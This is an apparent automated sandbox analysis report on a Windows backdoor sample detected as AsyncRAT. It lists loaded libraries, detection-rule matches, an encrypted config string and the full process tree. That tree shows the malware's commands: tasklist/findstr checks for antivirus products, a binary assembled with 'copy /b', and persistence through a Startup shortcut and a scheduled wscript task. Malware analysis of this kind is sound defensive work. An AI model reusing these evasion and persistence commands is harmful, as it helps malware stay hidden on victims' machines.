Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'

Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@46/20@1/1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B41FA GetLastError,FormatMessageW,

11_2_004B41FA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_004A2010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A1A0B AdjustTokenPrivileges,CloseHandle,	11_2_004A1A0B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404967

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

11_2_004ADD87

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

11_2_004B3A0E

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\0vyG14tDobaS6ejo

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user~1\AppData\Local\Temp\nskE4D4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Virustotal: Detection: 21%
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit	Jump to behavior
